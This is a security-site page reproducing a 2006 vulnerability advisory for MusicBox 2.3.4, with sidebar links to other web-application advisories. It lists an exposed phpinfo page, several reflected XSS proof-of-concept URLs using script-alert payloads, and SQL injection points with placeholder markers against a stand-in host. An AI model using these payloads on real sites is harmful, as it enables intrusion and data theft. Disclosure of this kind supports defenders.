Информационная безопасность
[RU] switch to English


Дополнительная информация

  Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl)

  SQuery v.x (devi.php) (armygame.
php) Remote File Inclusion

  [MajorSecurity #26] Woltlab Burning Board - Multiple Cookie manipulation and session fixation vulnerabilities

  XSS в Devium CMS 1.5

  SQL-Injection in Shop-Script PRO & Shop-Script Premium all version

From:securityconnection_(at)_gmail.com <securityconnection_(at)_gmail.com>
Date:25 июля 2006 г.
Subject:MusicBox <= 2.3.4 XSS SQL injection Vulnerability

MusicBox 2.3.4
http://www.musicboxv2.com
------------
PHPinfo page
------------
/phpinfo.php
--------------------------
Cross Site Scripting (XSS)
--------------------------
http://www.target.xx/?id=><script>alert(/EllipsisSecurityTest/)<
/script>&page=0
http://www.target.xx/index.php?id=><script>alert(/EllipsisSecurityTe
st/)</script>&page=0
http://www.target.xx/index.php?term=<script>alert(/EllipsisSecurityTest
/)</script>&in=song&action=search&start=0
http://www.target.xx/index.php?action=top&show=5&type=<script>alert
(/EllipsisSecurityTest/)</script>
http://www.target.xx/index.php?action=top&show=<script>alert(/Ellip
sisSecurityTest/)</script>&type=Artists
-------------
SQL injection
-------------
http://www.target.xx/index.php?term=hit&in=song&action=search&start=`
[SQL]
http://www.target.xx/index.php?action=top&show=1'[SQL]&type=Artists
http://www.target.xx/?action=viewgallery&type=album&aid=&page=-1[SQL]

-----------------
Ellipsis Security
http://www.ellsec.org

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород